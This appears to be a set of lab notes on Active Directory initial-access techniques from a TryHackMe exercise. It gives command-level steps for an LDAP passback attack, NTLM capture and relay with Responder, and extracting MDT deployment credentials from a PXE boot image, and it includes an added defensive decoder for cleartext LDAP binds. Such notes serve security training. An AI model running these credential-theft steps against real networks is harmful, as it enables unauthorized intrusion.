# 1. Getting a Foothold

## Brute Forcing NetNTLM

Internet-facing applications may have their authentication tied back to AD. If we manage to brute force these credentials, we may gain access to the server.

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2F7zLMvG2VUGe5ATXP9YQO%2Fimage.png?alt=media&#x26;token=cab53096-10c6-4f4e-b8ff-abe467f7bdb1" alt=""><figcaption></figcaption></figure>

## LDAP Passback attack

If we have access to a page with LDAP configuration where the password is censored out, we can set up our own LDAP server, point the device at it, and intercept the traffic to obtain the password.

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2Fw57C5sMNvRHG7IvlumMc%2Fimage.png?alt=media&#x26;token=b3bf3a60-e8ed-4ea8-8f86-0a63d80627fe" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```sh
$ sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

$ sudo dpkg-reconfigure -p low slapd
```

{% endcode %}

Create an `olcSaslSecProps.ldif` file

```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

Patch the running slapd configuration with the created file and restart the service

{% code overflow="wrap" %}

```bash
$ sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```

{% endcode %}

Run tcpdump, then click `Test Settings` on the device's LDAP configuration page so it sends the bind request to our server

```bash
$ sudo tcpdump -SX -i <interface> tcp port 389
```
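What that capture contains, as an added example that is not part of the original notes: a minimal BER decoder for the LDAP BindRequest seen on port 389, which flags a simple bind carrying a password (the condition the passback relies on, and the same signal a defender can alert on when devices bind to anything other than a domain controller). The DN and password in `sample_simple_bind` are constructed placeholders.

```python
def encode_tlv(tag: int, payload: bytes) -> bytes:
    """Minimal BER TLV encoder, used only to build the constructed sample below."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")   # long-form length
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def parse_tlv(buf: bytes, off: int = 0):
    """Decode one BER TLV at buf[off]; return (tag, value, offset_after)."""
    tag, n = buf[off], buf[off + 1]
    off += 2
    if n & 0x80:                                          # long-form length
        width = n & 0x7F
        n = int.from_bytes(buf[off:off + width], "big")
        off += width
    return tag, buf[off:off + n], off + n

def inspect_bind(buf: bytes) -> dict:
    """Parse one LDAPMessage and describe the BindRequest it carries, if any."""
    tag, body, _ = parse_tlv(buf)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, off = parse_tlv(body)                         # messageID INTEGER
    op_tag, op, _ = parse_tlv(body, off)                  # protocolOp
    info = {"message_id": int.from_bytes(mid, "big"), "is_bind": op_tag == 0x60}
    if not info["is_bind"]:                               # 0x60 = [APPLICATION 0] BindRequest
        return info
    _, ver, off = parse_tlv(op)                           # version INTEGER
    _, name, off = parse_tlv(op, off)                     # name OCTET STRING (bind DN)
    auth_tag, cred, _ = parse_tlv(op, off)                # authentication CHOICE
    auth = "simple" if auth_tag == 0x80 else "sasl" if auth_tag == 0xA3 else "other"
    info.update(version=ver[0], dn=name.decode(), auth=auth, cred_len=len(cred))
    return info

def cleartext_bind_alert(buf: bytes):
    """Alert string for a simple bind that carries a password; None otherwise."""
    info = inspect_bind(buf)
    if info["is_bind"] and info["auth"] == "simple" and info["cred_len"] > 0:
        return (f"plaintext LDAP bind: dn={info['dn']} "
                f"credential_bytes={info['cred_len']} (password not echoed)")
    return None

def sample_simple_bind() -> bytes:
    """Constructed sample of the bind a device's 'Test Settings' button sends (placeholder values)."""
    dn = b"cn=ldapsvc,dc=example,dc=com"                 # placeholder bind DN
    bind = (encode_tlv(0x02, b"\x03") + encode_tlv(0x04, dn)
            + encode_tlv(0x80, b"ConstructedSecret1"))    # placeholder password
    return encode_tlv(0x30, encode_tlv(0x02, b"\x01") + encode_tlv(0x60, bind))
```

Running `cleartext_bind_alert(sample_simple_bind())` reports the bind DN and credential length; feed it the TCP payload of a real capture to check whether a device is still binding in cleartext after the fix (LDAPS or signing) is applied.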

## SMB Auth Relay

Use `Responder` to intercept NTLM authentication traffic.

{% embed url="https://github.com/lgandx/Responder" %}

After we get the NTLM hash, we can either:

1. Crack the hash
2. Relay the hash and MITM the process of getting a TGS. For this to work, SMB signing needs to be disabled, or enabled but not enforced.

## Microsoft Deployment Toolkit

Extracting credentials preloaded into the PXE boot image served by MDT

Download the BCD file from the MDT server over TFTP

{% code overflow="wrap" %}

```powershell
C:\Users\THM\Documents\Am0> tftp -i <THMMDT IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd
```

{% endcode %}

Get the location of the WIM file by parsing the BCD file with PowerPXE

{% code overflow="wrap" %}

```powershell
C:\Users\THM\Documents\Am0> powershell -executionpolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\THM\Documents\am0> Import-Module .\PowerPXE.ps1
PS C:\Users\THM\Documents\am0> $BCDFile = "conf.bcd"
PS C:\Users\THM\Documents\am0> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim
```

{% endcode %}

Download the WIM file and extract the credentials stored in its `Bootstrap.ini`

{% code overflow="wrap" %}

```powershell
PS C:\Users\THM\Documents\am0> tftp -i <THMMDT IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 218 second(s), 1568346 bytes/s
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
PS C:\Users\THM\Documents\am0> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>
```

{% endcode %}

## Configuration files

If we already have access to the host machine, search for artifacts that may contain credentials:

* Configuration files
* Data stores
* Password stores

